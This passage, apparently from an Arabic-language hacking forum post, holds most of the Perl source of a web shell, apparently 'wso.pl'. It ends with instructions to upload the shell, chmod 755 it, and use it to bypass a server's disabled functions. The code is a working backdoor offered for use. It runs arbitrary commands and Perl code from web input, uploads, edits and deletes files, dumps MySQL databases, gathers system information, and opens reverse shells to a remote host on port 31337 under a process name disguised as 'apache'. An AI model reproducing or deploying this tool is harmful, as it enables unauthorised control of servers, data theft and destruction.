    }sub ExecuteCommand1{if($RunCommand=~ m/^\s*cd\s+(.+)/gis){if(!-r $1){$CurrentDir=~s!\Q//!/!g;$RunCommand="Can't read $1!";chop($CurrentDir=`\n$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPageHeader("c");print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "<textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly>$Prompt $RunCommand\n</textarea>";}else{&PrintPageHeader("c");&history;print "<h1>Console:</h1>$div";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "<textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly>$Prompt $RunCommand\n";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_=~s/(\n|\r\n)$//;print "$_\n";}$|=0;print "</textarea>"}else{print "<textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly><pre>";print `$Command`;print "</textarea>"}if(!$WinNT){alarm(0);}print "</pre>";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand="tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand="touch -t $ttempt $path";}if($RunCommand=~m/^\s*cd\s+(.+)/){$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt=$WinNT?"$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub SendFileToBrowser($){open (FILE, $_[0]);local ($/);$file=<FILE>;close (FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x-unknown\n";print "Content-Disposition: attachment;filename=".$1."\n";print "Content-Description: File to download\n\n";print $file;}sub SystemInfo{sub langs{$s="which gcc perl python php tar zip";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}sub perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s="php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/hosts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which lynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}sub httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return $s;}$langs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$phpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader("c");print "<h1>System information</h1>";print "$div1$tab<tr><td><span>OS version:</span>$div1";P(`cat /proc/version`);print "$dive</td></tr><tr><td><span>Distr name:</span>$div1";P(`lsb_release -a`);print "$dive</td></tr><td><span>HDD[mount]:</span>$div1";P(`$hdd1`);print "$dive</td><td><span>HDD[df -h]:</span>$div1";P(`$hdd`);print "<tr><td><span>PATHS:</span>$div1";P(`$langs`);print "$dive</td><td><span>DOWNLOADERS:</span>$div1";P(`$downloaders`);print "$dive</td></tr><tr><td><span>PERL version:</span>$div1";P(`$perlv`);print "$dive</td><td><span>PHP version:</span>$div1";P(`$phpv`);print "$dive</td></tr><tr><td><span>/etc/hosts:</span>$div1";P(`$hosts`);print "$dive</td><td><span>httpd.conf:</span>$div1";P(`$httpd`);print "$dive</td></tr>$tabe$dive";&PrintPageFooter;}sub sql_loginform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if(!$hhost){$hhost='localhost'};if(!$pport){$pport='3306'};if(!$usser){$usser='root'};print <<END;
    <form name='sf' method='post'><table cellpadding='2' cellspacing='0'><tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr><td><select name='type' id='nname'><option value='mysql' selected>MySql</option><option value='pgsql'>PostgreSql</option></select></td><td><input type=text name=sql_host value=$hhost></td><td><input type=text name=sql_port value=$pport></td><td><input type=text name=sql_login value=$usser></td><td><input type=text name=sql_pass value=$passs></td><td><input type=text name=sql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_connect"><td><input type=submit value='>>'></td></tr>$tabe</form><br><script>document.getElementById('nname').focus();</script>
    END
    }sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{ print <<END;
    $tab<td><span>Current query:</span></td><td><form name='querys' method='post'><textarea name='query' cols=70 style='width:100%;height:60px'>$zapros</textarea><br/><input type=submit value='Query'><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_query"></form></td>$tabe$tabe
    END
    }sub sql_cq_form{print <<END;
    $tab<td><span>Get data from columns:</span></td><td><form name='cquerys' method='post'><textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px'></textarea><br/><input type="hidden" name="a" value="sql_query"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value='Query'></form></td>
    END
    }sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0].'><input type="hidden" name="a" value="sql_databases"><input type=hidden name=database value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td></form></tr>';}sub sql_tables_form {print '<tr><form method=post name=tt'.$$ref[0].'><input type="hidden" name="a" value="sql_tables"><input type=hidden name=table value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td></form></tr>';}sub sql_columns_form{print '<script>function lol'.$s4et.'(f){if(f.checked){var cn=document.getElementById("cquery").value;if(cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}</script><tr><form method=post name=cc'.$$ref[0].'><input type="hidden" name="a" value="sql_columns"><input type=hidden name=column value='.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td></form><tr>';}sub sql_data_form {print '<tr><form method=post name=dt'.$$ref[0].'><input type="hidden" name="d" value="'.$CurrentDir.'"><td>'.$verd.'['.$s4et.'] </font></td><td>'.$verd.$$ref[0].'</font></td></form></tr>';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print <<END;
    <h1>Back-connect</h1>$div<form name='nfp' method=post><span>/bin/sh no tty</span><br>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go"><input type=submit value='>>'></form></div>
    $div<form name='nfp' method=post><span>/bin/bash with tty</span><br>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go1"><input type=submit value='>>'></form></div>
    END
    &PrintVar;}sub back{$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname("tcp");socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system("/bin/sh -i");close(STDIN);close(STDOUT);close(STDERR);}sub back1{use Fcntl;my $TIOCGPTN=-2147199952;my $TIOCSPTLCK=1074025521;my $EAGAIN=11;my $HOST=$target;my $PORT=$port;$0="apache";my $sock=new IO::Socket::INET(PeerAddr=>$HOST,PeerPort=>$PORT,Proto=>'tcp',Blocking=>0);sysopen(PTMX,'/dev/ptmx',O_RDWR|O_NONBLOCK);my $tmp='';ioctl(PTMX,$TIOCGPTN,$tmp);my $pts=unpack('i',$tmp);my $unlock=pack('i',0);ioctl(PTMX,$TIOCSPTLCK,$unlock);chdir '/';open STDIN,'/dev/null';umask 0;defined(my $pid=fork);exit if $pid;defined($pid=fork);if(!$pid){exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts");exit;}open STDOUT,'>>/dev/null';open STDERR, '>>/dev/null';my $pp=PTMX;$rin=$win=$ein='';vec($rin,fileno($pp),1)=1;vec($rin,fileno($sock),1)=1;select $sock;$|=1;select PTMX;$|=1;select STDOUT;$|=1;my $finished=0;sub forwarddata{my($from,$to)=@_;while(1){my $rv=sysread($from,$buff,1024);last if(!defined($rv)&& $!==$EAGAIN);defined($rv);if ($rv==0){$finished=1;last;}while(length $buff>0){$rv=syswrite($to,$buff,length $buff);if(!defined($rv)&&$!==$EAGAIN){next;}defined($rv);last if($rv==length $buff);substr($buff,0,$rv)='';}}}while(!$finished){my $nfound=select($rout=$rin,$wout=$win,$eout=$ein,undef);die $! if($nfound==-1);forwarddata($pp,$sock);last if $finished;forwarddata($sock,$pp);last if $finished;}close PTMX;close $sock;$wout=$eout.$wout.$rout;}sub NetGo{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back();&PrintPageFooter;}sub NetGo1{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back1();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print <<END;
    <h1>Execution PERL-code</h1><form name=pf method=post><textarea name=code class=bigarea id=PerlCode></textarea><input type="hidden" name="a" value="eval_code"><input type=submit value=Eval style="margin-top:5px">
    END
    }sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode=$in{'code'};print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}sub EditFilePathForm {print <<END;
    <code><br><form name=pfsd method=post>$Prompt<input type="text" name=path id=edit1_file><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=MakeDir></form></code>
    END
    }sub EditFilePath{$fpath="";$fpath=$CurrentDir."/".$ViewF;EditFilePrint();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}sub EditFileForm{open(FILE, $fpath);@file=<FILE>;$fccodde=HtmlSpecialChars(join('', @file));print '<h1>File tools:</h1>';&RTP_EDIT;print <<END;
    <div class=content><form name=pf11 method=post><textarea name=ccode class=bigarea id=editfile>$fccodde</textarea><input type="hidden" name="a" value="edit_file"><input type=hidden name=path value=$fpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form></div>
    END
    &PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE,$fpath);@file=<FILE>;$fccodde=join('',@file);$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</h1>';&RTP_EDIT;print decode_base64("PHNjcmlwdD5mdW5jdGlvbiBjb2xvcihjb2RlKXt2YXIgcz1bXTt2YXIgYz0iJyI7cmV0dXJuIGNvZGUucmVwbGFjZSgvXGIoY2FzZXxjYXRjaHxjb250aW51ZXxkb3xlbmRkb3xlbHNlfGVsaWZ8ZWxzZWlmfGlmZGVmfGlmbmRlZnxlbmRpZnxmb3J8Zm9yZWFjaHxpZnxmaXxzd2l0Y2h8dHJ5fHR5cGVvZnx3aGlsZXx3aXRofGJyZWFrfGluY2x1ZGV8cmVxdWlyZXxyZXF1aXJlX29uY2V8Zm9wZW58ZnB1dHN8ZnJlYWR8ZmlsZV9nZXRfY29udGVudHN8ZmlsZV9wdXRfY29udGVudHN8cHJlZ19yZXBsYWNlfGltcG9ydHxleGNlcHR8ZGVmaW5lfGRlZmluZWR8dW5kZWYpXGIvZ2ltLCc8c3Bhbj4kMTwvc3Bhbj4nKS5yZXBsYWNlKC8oe3x9KS9naW0sJzxzcGFuPiQxPC9zcGFuPicpLnJlcGxhY2UoL1xiKGZ1bmN0aW9ufHN1YnxkZWZ8dm9pZHxpbnR8cmV0dXJufGV2YWx8YXNzZXJ0fGV4ZWNsfGV4ZWN2fGV4ZWN2ZXxleGVjfGV4ZWNwfGRpZVwoXCkpXGIvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jMDBmZmZmPiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYihzdHJ1Y3R8ZXhpdHxjbGFzc3xzeXN0ZW18cHJpbnR8cHJpbnRmfGVjaG98c3ByaW50ZnxmcHJpbnRmfHZhclxzKVxiL2dpbSwnPGI+JDE8L2I+JykucmVwbGFjZSgvXGIoMHhbXGRhLXpdK3xcZCspXGIvZ2ltLCAnPGZvbnQgY29sb3I9I2ZmYTA3YT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXFx4W1xkYS16XSopL2dpbSwgJzxmb250IGNvbG9yPSNmZmEwN2E+JDE8L2ZvbnQ+JykucmVwbGFjZSgvXGIoaHR0cFw6XC9cLypcLz98aHR0cHNcOlwvXC8qXC8/fGZ0cFw6XC9cLypcLz8pXGIvZ2ltLCc8dT48Zm9udCBjb2xvcj0jZmFmYWQyPiQxPC91PjwvZm9udD4nKS5yZXBsYWNlKC8oIi4qPyJ8Jy4qPycpL2csJzxmb250IGNvbG9yPSNmYWZhZDI+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCouKlwqXC98XC9cLy4qKS9naW0sJzxmb250IGNvbG9yPSM2OTY5Njk+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCpbXHNcU10qP1wqXC8pL2dpbSwnPGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXiMuKiQpL2dpbSwnPGI+PGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD48L2I+JykucmVwbGFjZSgvKFwkW19hLXowLTldKikvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jOThmYjk4PiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC88cihcZCspPi9naW0sZnVuY3Rpb24obWF0Y2gsaWQpe3ZhciByPXNbaWQtMV07dmFyIGNzcz1yLm1hdGNoKC9eKFwvXC98XC9cKnwtKS8pPydjb21tZW50JzpyLm1hdGNoKC9eWyYnXS8pPydzdHJpbmcnOidyZWdleHAnO3JldHVybiAnPHNwYW4gY2xhc3M9IicrY3NzKyciPicrcisnPC9zcGFuPic7fSl9O2Z1bmN0aW9uIGNoYW5nZVRleHQoKXt2YXIgYT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2Njb2RlZScpLmlubmVySFRNTDthPWNvbG9yKGEpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjY2NvZGVlJykuaW5uZXJIVE1MPWE7fTwvc2NyaXB0Pg==");
    print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></div>";&PrintVar;&PrintPageFooter;}sub HEXDUMP{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");$fccodde=`hexdump -C $fpath`;$fccodde=HtmlSpecialChars($fccodde);print '<h1>File tools:</h1>';&RTP_EDIT;print"<div class=content><pre class=ml1 id='cccodee'>$fccodde</pre></div>";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c");$fccode=$in{'ccode'};$ffpath=$in{"path"};print <<END;
    <h1>File: $ffpath saved</h1><form name=pf11 method=post><textarea name=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidden" name="a" value="filemanager"><niput type=hidden name=path value=$ffpath><input type="hidden" name="ddd" value="$ViewF"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Files style="margin-top:5px"></form>
    END
    open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);&PrintVar;&PrintPageFooter;}sub jquery{print '<script>document.querys.query.value="'.$zapros.'";</script>';}sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};print <<END;
    <script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("column","$column","","/");</script>
    END
    print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";$zapros="SHOW TABLES FROM $dbb";sql_cq_form();print "</td><td>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($zapros);$sth->execute;print $tabe;print "<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$sth=$dbh->prepare("show columns from $table from $dbb");$sth->execute;while($ref=$sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;print "$tabe</td>";$s4et=0;$zapros="SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_data_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qqquery=$in{'table'};print <<END;
    <script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("table","$qqquery","","/");</script>
    END
    print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare('SHOW DATABASES');$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";jquery();while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tab<td>";sql_cq_form();print "</td><td>";sql_query_form();print "</td>$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "<b>Tables from $dbb:</b><br><table border=1 cellspacing=0 cellpadding=1 cols=4><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "$tabe</td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$zapros="SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;while($ref=$sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe</td>$tabe";&PrintPageFooter;}sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb=$in{'database'};print <<END;
    <script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("dbb","$ddb","","/");</script>
    END
    print "$tbb$verd";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$zapros="SHOW TABLES FROM `$ddb`";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "$tabe";print "<b>Tables from $ddb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery=$in{'query'};}$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "$verd<table width=100% cellspacing=0 cellpadding=1 cols=2><b>DATABASES:</b><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>$tbb>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$sth=$dbh->prepare($qquery);$sth->execute;print "<b>Results:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=10>";while($ref=$sth->fetchrow_arrayref){$s4et++;print "<tr><td>$verd [$s4et]</font></td><td>".$verd.$$ref[0]."</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe";print '<script>document.querys.query.value="'.$qquery.'";</script>';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros="SHOW DATABASES";jquery();$sth=$dbh->prepare($zapros);$sth->execute;print "$verd $tbb<b>DATABASES:</b><td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>";sql_query_form();print "</td>$tabe";$rc = $dbh->disconnect;print '</font>';return;}print "Some error...</font>";&PrintVar;&PrintPageFooter;}sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "<font size=1>Uploading $TransferFile to $CurrentDir...<br>";chop($TargetName) if($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, ">$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub Remove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm $path");}&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$RunCommand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($RunCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunCommand2 eq "delete"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "hexdump"){&HEXDUMP;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$TransferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "net_go1"){&NetGo1;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}



    [/PERL]


    تمام التمام هذا شل بيرل مميز عندي بعد رفعة نقوم ب اعطائة تصريح :ُeُeW:


    [​IMG]

    chmod 755 wso.pl
    و نقوم ب استعراضة
    و سيتم تخطي جميع الدوال الممنوعة في السيرفر
    :lolًٌُ:ٌ
    [​IMG]

    انا اختاريت هذا السيرفر لانة قوي جدآ الحمد لله تم تخطي كل المشاكل
    و الوصول ل المطلوب
    {2$0}
    بعد تخطي كل هذي الدوال الممنوعة و الوصول ل المطلوب ب كل سهولة
